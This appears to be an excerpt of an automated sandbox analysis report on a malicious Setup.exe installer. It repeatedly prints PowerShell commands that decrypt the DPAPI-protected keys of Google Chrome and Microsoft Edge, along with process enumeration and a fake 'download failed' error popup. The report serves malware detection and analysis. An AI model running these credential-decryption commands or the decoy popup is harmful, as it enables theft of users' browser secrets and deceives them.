Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe File opened: C:\Users\user\AppData\Local Jump to behavior
Source: libGLESv2.dll.0.dr Binary or memory string: VMware
Source: libGLESv2.dll.0.dr Binary or memory string: IIAMDARMAppleBroadcomGoogleIntelMesaMicrosoftNVIDIAImagination TechnologiesQualcommSamsung Electronics Co., Ltd.VivanteVMwareTestX
Source: libGLESv2.dll.0.dr Binary or memory string: (IsLinux() && isVMWare) || (IsAndroid() && isNvidia) || (IsAndroid() && GetAndroidSdkLevel() < 27 && IsAdreno5xxOrOlder(functions)) || (IsAndroid() && IsMaliT8xxOrOlder(functions)) || (IsAndroid() && IsMaliG31OrOlder(functions))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1636 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tasklist" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser')" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser')" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --mojo-platform-channel-handle=2076 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2480 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser') Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser') Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\cmd.exe cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "c:\users\user\appdata\local\temp\2efagdfganpog197yhkhbxawy9z\setup.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\setup" --gpu-preferences=uaaaaaaaaadgaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaaegaaaaaaaaasaaaaaaaaaayaaaaagaaabaaaaaaaaaagaaaaaaaaaaqaaaaaaaaaaaaaaaoaaaaeaaaaaaaaaabaaaadgaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1636 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'currentuser')"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'currentuser')
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'currentuser')"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'currentuser')
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "c:\users\user\appdata\local\temp\2efagdfganpog197yhkhbxawy9z\setup.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\setup" --mojo-platform-channel-handle=2076 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "c:\users\user\appdata\local\temp\2efagdfganpog197yhkhbxawy9z\setup.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="c:\users\user\appdata\roaming\setup" --gpu-preferences=uaaaaaaaaadoaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaacqaaaaaaaaaaaaaaaaaaaaaaaaaegaaaaaaaaasaaaaaaaaaayaaaaagaaabaaaaaaaaaagaaaaaaaaaaqaaaaaaaaaaaaaaaoaaaaeaaaaaaaaaabaaaadgaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=2480 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "c:\users\user\appdata\local\temp\2efagdfganpog197yhkhbxawy9z\setup.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\setup" --gpu-preferences=uaaaaaaaaadgaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaaegaaaaaaaaasaaaaaaaaaayaaaaagaaabaaaaaaaaaagaaaaaaaaaaqaaaaaaaaaaaaaaaoaaaaeaaaaaaaaaabaaaadgaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1636 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'currentuser')" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /d /s /c "powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'currentuser')" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "c:\users\user\appdata\local\temp\2efagdfganpog197yhkhbxawy9z\setup.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\setup" --mojo-platform-channel-handle=2076 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Process created: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe "c:\users\user\appdata\local\temp\2efagdfganpog197yhkhbxawy9z\setup.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="c:\users\user\appdata\roaming\setup" --gpu-preferences=uaaaaaaaaadoaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaacqaaaaaaaaaaaaaaaaaaaaaaaaaegaaaaaaaaasaaaaaaaaaayaaaaagaaabaaaaaaaaaagaaaaaaaaaaqaaaaaaaaaaaaaaaoaaaaeaaaaaaaaaabaaaadgaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=2480 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'currentuser') Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-type -assemblyname system.security; [system.security.cryptography.protecteddata]::unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'currentuser') Jump to behavior
Source: Setup.exe, 00000003.00000000.2275324260.00007FF705062000.00000002.00000001.01000000.00000008.sdmp, Setup.exe, 00000009.00000000.2317806366.00007FF705062000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: ..\..\electron\shell\browser\ui\views\electron_views_delegate_win.ccGetAppbarAutohideEdgesShell_TrayWnd
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe Queries volume information: C:\Users\user\AppData\Local VolumeInformation Jump to behavior
